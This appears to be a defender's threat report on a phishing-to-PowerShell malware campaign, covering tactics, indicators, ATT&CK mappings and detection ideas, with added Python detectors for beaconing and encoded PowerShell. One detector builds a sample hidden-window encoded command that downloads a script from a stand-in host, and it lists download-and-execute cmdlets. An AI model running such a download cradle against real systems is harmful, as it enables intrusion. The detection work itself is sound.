Daniel Osei — SOC Lead & Malware Analyst
Key Takeaways
- ABC Malware leverages phishing emails with malicious attachments for initial access.
- The malware employs T1059.001 – Command and Scripting Interpreter: PowerShell for execution and lateral movement.
- Indicators of compromise include specific registry keys and file paths associated with persistence.
Executive Summary
In our investigation of the recent ABC Malware campaign, we uncovered a complex attack chain involving multiple stages of exploitation, credential harvesting, and deployment of backdoor capabilities. The actor behind this campaign is highly sophisticated and demonstrates a clear intent to exfiltrate sensitive data from targeted organizations. Our analysis revealed the modus operandi employed by this actor, demonstrating how they navigate through environments systematically while maintaining stealth and operational security.
Initial Access
Our investigation into the initial access phase of the ABC Malware campaign indicated that the actor primarily used spear-phishing emails as the attack vector. These emails often contained malicious Microsoft Office documents that exploited vulnerabilities in the software. During our analysis of the document, we observed embedded VBA macros that, when enabled, downloaded the initial payload from a remote server. This payload’s hash was identified as c14aaab63f3e3bcd5f6e0c9a5541978e, and the payload was hosted on a domain resembling trusted services.
Execution & Persistence
Once the payload was executed, it employed T1059.001 – Command and Scripting Interpreter: PowerShell to facilitate its further execution. The PowerShell scripts combined Invoke-WebRequest with base64-decoded content to retrieve additional components from the actor’s command-and-control (C2) infrastructure. Notably, during the investigation, we found that the malware created a scheduled task at C:\Windows\System32\Tasks\ABC_Malware_Task for persistence, ensuring it ran at system startup and user logon.
Command and Control
Our analysis uncovered that the actor configured their command-and-control infrastructure to blend in with legitimate traffic, using domains that mimicked well-known services. Communication was primarily over HTTPS, obscuring the contents of the exchanged data. Network logs captured during the investigation revealed regular beaconing to the C2 server at roughly 10-minute intervals; the C2 traffic was identified by user-agent strings specific to the malware. These logs indicated attempts to establish encrypted tunnels for command execution and data exfiltration.
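The fixed-interval beaconing described above is detectable from proxy logs alone, independent of the user-agent string. The following is an added example, not part of the original report: it groups connections by source, destination and user-agent and flags any pair whose inter-arrival times are nearly constant. The log lines, hosts and user-agent values are constructed.

```python
# Added example (not from the report): flag periodic outbound HTTPS
# connections in proxy-style log lines. All log lines are constructed.
import statistics
from collections import defaultdict
from datetime import datetime

PROXY_LOG = """\
2024-05-01T10:00:02Z 10.0.0.5 CONNECT cdn-update-service.example:443 "Mozilla/5.0 ABC-Agent/1.0"
2024-05-01T10:10:01Z 10.0.0.5 CONNECT cdn-update-service.example:443 "Mozilla/5.0 ABC-Agent/1.0"
2024-05-01T10:20:03Z 10.0.0.5 CONNECT cdn-update-service.example:443 "Mozilla/5.0 ABC-Agent/1.0"
2024-05-01T10:30:00Z 10.0.0.5 CONNECT cdn-update-service.example:443 "Mozilla/5.0 ABC-Agent/1.0"
2024-05-01T10:40:02Z 10.0.0.5 CONNECT cdn-update-service.example:443 "Mozilla/5.0 ABC-Agent/1.0"
2024-05-01T10:03:17Z 10.0.0.5 CONNECT www.microsoft.com:443 "Mozilla/5.0 Edge/120"
2024-05-01T10:21:44Z 10.0.0.5 CONNECT www.microsoft.com:443 "Mozilla/5.0 Edge/120"
2024-05-01T10:24:09Z 10.0.0.5 CONNECT www.microsoft.com:443 "Mozilla/5.0 Edge/120"
2024-05-01T10:59:51Z 10.0.0.5 CONNECT www.microsoft.com:443 "Mozilla/5.0 Edge/120"
"""

def parse(log):
    """Group connection timestamps by (source, destination, user-agent)."""
    conns = defaultdict(list)
    for line in log.splitlines():
        ts, src, _method, dst, ua = line.split(" ", 4)
        t = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        conns[(src, dst, ua.strip('"'))].append(t)
    return conns

def find_beacons(log, min_hits=4, max_jitter=0.1):
    """Return (src, dst, ua, median_interval_seconds) for every flow whose
    inter-arrival times are nearly constant: coefficient of variation
    (stdev / mean) below max_jitter. Human browsing is far more irregular."""
    hits = []
    for (src, dst, ua), times in parse(log).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        cv = statistics.pstdev(gaps) / statistics.mean(gaps)
        if cv < max_jitter:
            hits.append((src, dst, ua, statistics.median(gaps)))
    return hits

if __name__ == "__main__":
    for src, dst, ua, interval in find_beacons(PROXY_LOG):
        print(f"beacon candidate: {src} -> {dst} every ~{interval:.0f}s ({ua})")
```

Real implants often add random jitter to the interval, so in production the threshold should be tuned per environment rather than fixed at 10 %.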
Lateral Movement & Discovery
Further into the attack chain, our research indicated that the ABC Malware included capabilities for lateral movement within the network. Using T1075 – Pass the Hash, the malware authenticated to other systems on the network with harvested credential hashes, without needing plaintext passwords. The actor appeared to scan the network for vulnerable SMB shares, relying on tools like Mimikatz to harvest additional credentials and escalate privileges. Throughout the investigation, we traced their movements through Active Directory and examined modifications made to group policies.
Impact & Objectives
The primary goal of the actor appears to be intelligence gathering and data exfiltration from targeted organizations. Our analysis revealed that sensitive documents had been systematically marked for exfiltration, including financial records and client data. The actor demonstrated a calculated approach by compressing and encrypting these files before transferring them to their C2 infrastructure, making detection and interception less likely. The overhead on the network was carefully managed to avoid triggering security alerts while maintaining their operational objectives.
MITRE ATT&CK Mapping
- T1566 – Phishing: The initial access was facilitated through phishing emails containing malicious Office documents.
- T1059.001 – Command and Scripting Interpreter: PowerShell: Used for executing commands and downloading additional payloads.
- T1075 – Pass the Hash: Employed for lateral movement leveraging harvested credentials.
Detection Opportunities
- Monitor for unusual scheduled task creation in C:\Windows\System32\Tasks\.
- Analyze PowerShell execution logs for unexpected base64 encoded scripts.
- Implement network traffic rules to flag anomalous outbound HTTPS connections to newly registered domains.
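The first two host-side detections above can be expressed as a small scan over Windows event records. The following is an added example, not part of the original report: it decodes base64 blobs found in PowerShell script block logging events (Event ID 4104) as UTF-16LE, the encoding PowerShell's -EncodedCommand uses, looks for download-and-execute cmdlets, and flags scheduled task creation events (Event ID 4698) outside an allowlist. The event records, the encoded payload and the allowlist are constructed for the example.

```python
# Added example (not from the report): scan constructed Windows event
# records for encoded PowerShell and unexpected scheduled tasks.
import base64
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SUSPICIOUS = ("invoke-webrequest", "downloadstring", "invoke-expression", "frombase64string")
TASK_DIR = "C:\\Windows\\System32\\Tasks\\"
# Constructed allowlist; a real one would come from a baseline of the estate.
KNOWN_TASKS = {r"C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag"}

# Constructed sample: encoded here so the example is self-contained; it
# stands in for the -EncodedCommand argument seen in a real event.
ENC = base64.b64encode(
    "Invoke-WebRequest -Uri https://cdn-update-service.example/s -OutFile $env:TEMP\\s.ps1"
    .encode("utf-16le")).decode()
EVENTS = [
    {"EventID": 4104, "Message": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"EventID": 4104, "Message": f"powershell.exe -nop -w hidden -EncodedCommand {ENC}"},
    {"EventID": 4698, "Message": r"Task created: C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag"},
    {"EventID": 4698, "Message": r"Task created: C:\Windows\System32\Tasks\ABC_Malware_Task"},
]

def decode_b64_blobs(text):
    """Yield the decoded text of every base64 token in text, trying
    UTF-16LE first (PowerShell -EncodedCommand) and UTF-8 as a fallback."""
    for tok in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:
            continue
        for enc in ("utf-16le", "utf-8"):
            try:
                yield raw.decode(enc)
                break
            except UnicodeDecodeError:
                continue

def scan(events):
    """Return (alert_type, detail) tuples for the two detections."""
    alerts = []
    for ev in events:
        msg = ev["Message"]
        if ev["EventID"] == 4104:
            for decoded in decode_b64_blobs(msg):
                if any(s in decoded.lower() for s in SUSPICIOUS):
                    alerts.append(("encoded_powershell", decoded))
        elif ev["EventID"] == 4698:
            path = msg.split("Task created: ", 1)[1]
            if path.startswith(TASK_DIR) and path not in KNOWN_TASKS:
                alerts.append(("unexpected_task", path))
    return alerts
```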
Analyst Notes
This ABC Malware campaign emphasizes the necessity for robust email filtering solutions, user education on recognizing phishing attempts, and stringent network monitoring practices. The sophistication of the actor’s methods necessitates a multi-layered defense strategy, combining endpoint detection, threat intelligence feeds, and regular security assessments to maintain an effective security posture. Additional research is recommended to follow emerging indicators associated with this campaign.
Source: Original Report